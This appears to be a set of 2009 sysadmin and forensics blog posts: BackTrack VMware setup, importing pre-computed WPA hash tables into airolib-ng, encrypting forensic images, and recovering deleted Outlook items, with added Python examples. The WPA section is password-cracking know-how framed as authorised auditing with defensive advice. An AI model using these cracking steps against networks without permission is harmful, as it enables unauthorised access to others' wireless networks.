The majority of the lab workstations are Windows boxes, so I went to the Transmission website to download the Windows remote client. It was then that I found that Transmission does not have a Windows client.

A few Google minutes later I found transmission-remote-dotnet on its Google Code page. I installed it, configured it to connect to the FreeNAS server and now have it running without any issues on a test machine.

Thursday, 2 April 2009

VMWare Shared Folders and BackTrack 4 Beta

I finally got around to trying out the latest version of BackTrack 4 Beta. Using VMware Workstation 6.5.1 I enabled "Shared Folders" so I could use some pre-compiled tables. However, when I browsed to /mnt/hgfs I saw an empty folder.
Trying "mount.hgfs .host:/ /mnt/hgfs/" gave the following error: "Error: cannot mount filesystem: No such device".

To fix this issue follow these steps.

Download and extract the latest tarball of open-vm-tools from SourceForge.

Download and extract the latest glib tarball, as open-vm-tools requires it.

Install glib:
./configure && make && make install

Build and install open-vm-tools; the --without flags skip the optional components it would otherwise depend on:
./configure --without-dnet --without-x --without-unity --without-icu && make && make install

Reboot and use the following command to mount your VMware shared folder:

mount -t vmhgfs .host:/ /mnt/hgfs/

Wednesday, 1 April 2009

Add Pre-Computed WPA hashes to airolib

First I obtained the 33GB rainbow table from

Please note that the 33 GB file is compressed using a number of methods so you need a lot of space to decompress the hash files.

When the file is downloaded (wpa_psk-h1kari_renderman.tar.lzma), extract it; I used 7zip.
Once extracted you are left with wpa_psk-h1kari_renderman.tar

Next, decompress the .tar; again I used 7zip.
When the extraction is complete you will have 9 folders; these folders contain the pre-computed hashes.

Now all you have to do is know what ESSID you are looking for. I assume you are auditing your OWN NETWORK or have permission to audit your client's network.

I want to audit a wireless network with WPA encryption and an ESSID of "Private".

airolib-ng testdb --import cowpatty /mnt/sdb1/wpapsk/xag-0/Private

There will then be some reading and writing to "testdb".

airolib-ng testdb --stats

You should see your ESSID computed to 100%.
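The reason the tables are split per ESSID, and the caveat worth keeping in mind when you plan your own network, is that the WPA/WPA2-Personal PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID. A table built for "Private" says nothing about a network called "Private2" or "private". The following is an added example written for this post, not code from the original or from the aircrack-ng project; it derives the PMK with Python's standard library, checks it against the published IEEE 802.11i test vector, and shows that changing the SSID changes every entry of the table (the candidate passphrase used in the comparison is a constructed example value).

```python
import hashlib

# WPA/WPA2-Personal derives the 256-bit Pairwise Master Key with
# PBKDF2-HMAC-SHA1, 4096 iterations, using the SSID as the salt (IEEE 802.11i).
PMK_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the PMK for a passphrase on a network with the given SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PMK_ITERATIONS, PMK_LEN)


def ieee_test_vector_ok() -> bool:
    """Check the implementation against the published 802.11i test vector
    (passphrase "password", SSID "IEEE")."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


def table_covers_network(table_essid: str, network_essid: str) -> bool:
    """A pre-computed table only applies when the salt matches exactly: the same
    passphrase gives a different PMK under any other SSID, so the table entry is
    useless there. Demonstrated with one constructed candidate passphrase."""
    candidate = "password"  # constructed example value
    return derive_pmk(candidate, table_essid) == derive_pmk(candidate, network_essid)


if __name__ == "__main__":
    print("test vector ok:", ieee_test_vector_ok())
    print("table for 'Private' covers 'Private': ", table_covers_network("Private", "Private"))
    print("table for 'Private' covers 'Private2':", table_covers_network("Private", "Private2"))
    print("table for 'Private' covers 'private': ", table_covers_network("Private", "private"))
```

The defensive reading of this is simple: a unique SSID (and a long passphrase) means none of the public pre-computed tables apply to your network, and an auditor has to spend the full 4096 iterations per candidate passphrase.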

Thursday, 19 March 2009

Creating Encrypted Forensic Images

Recently we have been asked by some of our clients to encrypt the forensic images we collect before leaving their site. Below are two possible solutions.

Hardware Capture Method

Using a Solo or Talon, create a standard dd image of the suspect hard drive.
While the drive is being imaged, use a forensic laptop to create a TrueCrypt volume on a new NTFS-formatted hard drive. Make sure that the TrueCrypt volume is larger than the disk being imaged.

When the Solo or Talon has finished imaging, robocopy the dd image to the mounted TrueCrypt volume.

Verify that the image can be opened without any errors.
Securely erase the images from the non-encrypted drives using your local standard method.

Software Capture Method

Create a TrueCrypt-encrypted hard drive formatted as NTFS.
This can be done in advance, as it will take some time to format and encrypt a 500GB hard drive.

Using FTK, EnCase, dd, etc.:

Mount the TrueCrypt-encrypted drive.
Connect the suspect drive to a write blocker.
Create an image of the drive as normal to the TrueCrypt-mounted drive.
When complete, robocopy the image to another TrueCrypt-encrypted "backup" hard drive.

I'd be interested to know how others are dealing with these requests. Has anyone used Seagate's Momentus 5400 FDE.2 drive to accomplish this before?
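Two of the steps above, and the EnCase/Tableau T335 observation in the earlier post, come down to the same check: a digest of the bytes, taken independently of whatever the acquisition tool reports. Hashing the suspect drive before and after acquisition catches a bay that was really read/write regardless of the write-blocked flag in the report, and hashing the image against its robocopy'd backup confirms the copy on the second TrueCrypt volume is byte-identical. The block below is an added example for both posts, not code from the original, from EnCase or from Tableau; the files it hashes are constructed stand-ins (temp files playing the suspect drive, the dd image and the backup) so it runs offline, and on a real case you would pass the device node or image path to hash_file instead.

```python
import hashlib
import os
import shutil
import tempfile

CHUNK = 1 << 20  # 1 MiB: hash in chunks so a multi-hundred-GB image never has to fit in RAM


def hash_file(path: str, algo: str = "sha256") -> str:
    """Hex digest of a file (or a raw device node opened read-only), read in chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def source_unchanged(device: str, digest_before: str) -> bool:
    """Post-acquisition check on the suspect drive: re-hash it and compare with the
    digest taken before imaging. Any write that slipped past the bay shows up here,
    whatever write-blocked flag the acquisition tool reported."""
    return hash_file(device) == digest_before


def copy_verified(image: str, backup: str) -> bool:
    """Check that the image on the backup volume is byte-identical to the original."""
    return hash_file(image) == hash_file(backup)


def known_vector_ok() -> bool:
    """Sanity-check hash_file against the published SHA-256 of b'abc'."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"abc")
        path = f.name
    try:
        return hash_file(path) == "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
    finally:
        os.unlink(path)


def demo() -> tuple:
    """Constructed stand-in data: temp files play the suspect drive, the dd image on the
    TrueCrypt volume and the backup copy. Returns (clean, tampered, good_copy, bad_copy)."""
    work = tempfile.mkdtemp()
    try:
        device = os.path.join(work, "suspect_drive.bin")
        with open(device, "wb") as f:
            f.write(os.urandom(3 * CHUNK + 123))  # deliberately not a whole number of chunks
        before = hash_file(device)                 # digest taken before acquisition

        image = os.path.join(work, "image.dd")
        shutil.copyfile(device, image)             # stands in for the dd acquisition
        clean = source_unchanged(device, before)   # True: source untouched by imaging

        with open(device, "r+b") as f:             # simulate a bay that was really read/write:
            f.seek(4096)                           # something wrote to the evidence drive
            f.write(b"\x00" * 16)
        tampered = source_unchanged(device, before)  # False: pre/post digests differ

        backup = os.path.join(work, "backup.dd")
        shutil.copyfile(image, backup)             # stands in for robocopy to the backup volume
        good_copy = copy_verified(image, backup)   # True
        with open(backup, "r+b") as f:
            f.truncate(CHUNK)                      # a short copy, e.g. an interrupted transfer
        bad_copy = copy_verified(image, backup)    # False
        return clean, tampered, good_copy, bad_copy
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print("known vector ok:", known_vector_ok())
    print("(clean, tampered, good_copy, bad_copy) =", demo())
```

Record the digests in your notes alongside the tool's own acquisition hash; if the two disagree, the tool's write-blocked statement is the thing to doubt, not the arithmetic.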

Thursday, 19 February 2009

Recover Deleted Outlook Items

Open the PST in a hex editor.

Delete positions 7 through 13 with the spacebar.
Since the editor uses hexadecimal numbering, this actually clears 13 characters at the following positions:
00007, 00008, 00009, 0000a, 0000b, 0000c, 0000d, 0000e, 0000f, 00010, 00011, 00012, 00013
As you clear the characters, the editor displays the code "20" (an ASCII space) in their position.

Save the PST; it is now corrupted.

Run the Inbox Repair Tool, SCANPST.exe, to recover the file.

On Windows 2000 and Windows NT systems, the executable is located in
C:\Program Files\Common Files\System\Mapi\1033\NT

You can also find it on the Office 2000 CD-ROM in
\Program Files\Common\System\Mapi\1033\NT.

On Windows XP, the file is located in
C:\Program Files\Common Files\System\Mapi\1033

On Windows XP with Office XP/2002 SP2:
C:\Program Files\Common Files\System\MSMAPI\1033

The Inbox Repair Tool creates a backup, repairs the damage and recreates the PST.

Open the new PST in Outlook.

The Deleted Items folder should now contain the deleted messages, unless Outlook has already deleted them by compacting the PST.
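The hex-editor step is the one people get wrong, because "positions 7 through 13" are hexadecimal offsets: 0x07 to 0x13 inclusive, thirteen bytes, which is why the post lists thirteen addresses. The following is an added example, not part of the original post, that applies the same edit to a copy of the PST so the original is left untouched and SCANPST is pointed at the copy; the sample file it operates on is constructed (the real "!BDN" PST magic followed by a counting pattern), and the comment on which header fields those offsets cover is taken from the published MS-PST header layout.

```python
from pathlib import Path
import tempfile

# Offsets from the post, read as hexadecimal: 0x07 through 0x13 inclusive (13 bytes).
FIRST, LAST = 0x07, 0x13
FILL = 0x20  # ASCII space, the "20" the hex editor shows after the spacebar
# In the published MS-PST header layout these bytes cover the last byte of dwCRCPartial,
# wMagicClient, wVer, wVerClient, the two platform bytes and dwReserved1, which is why
# SCANPST treats the file as damaged and rebuilds it from the node tree.


def blank_header_bytes(src: str, dst: str) -> int:
    """Write a copy of src to dst with bytes FIRST..LAST replaced by FILL.
    Returns the number of bytes overwritten. The source PST is never modified."""
    data = bytearray(Path(src).read_bytes())
    if len(data) <= LAST:
        raise ValueError("file too small to hold a PST header")
    count = LAST - FIRST + 1
    data[FIRST:LAST + 1] = bytes([FILL]) * count
    Path(dst).write_bytes(data)
    return count


def demo(workdir: str = None) -> tuple:
    """Constructed stand-in: a 64-byte file starting with the real PST magic '!BDN'
    followed by a counting pattern, so every changed byte is easy to spot.
    Returns (bytes overwritten, leading bytes intact, cleared bytes are spaces, tail intact)."""
    tmp = None
    if workdir is None:
        tmp = tempfile.TemporaryDirectory()
        workdir = tmp.name
    try:
        src = Path(workdir) / "sample.pst"
        dst = Path(workdir) / "sample_corrupted.pst"
        original = b"!BDN" + bytes(range(4, 64))
        src.write_bytes(original)
        n = blank_header_bytes(str(src), str(dst))
        out = dst.read_bytes()
        return (
            n,
            out[:FIRST] == original[:FIRST],            # magic and bytes 0..6 untouched
            out[FIRST:LAST + 1] == b" " * n,            # the 13 cleared bytes
            out[LAST + 1:] == original[LAST + 1:],      # everything after 0x13 untouched
        )
    finally:
        if tmp is not None:
            tmp.cleanup()


if __name__ == "__main__":
    print(demo())
```

Run blank_header_bytes against a copy of the mailbox, hand the copy to SCANPST.exe, and keep the untouched original; if the repair does not bring the items back, nothing has been lost.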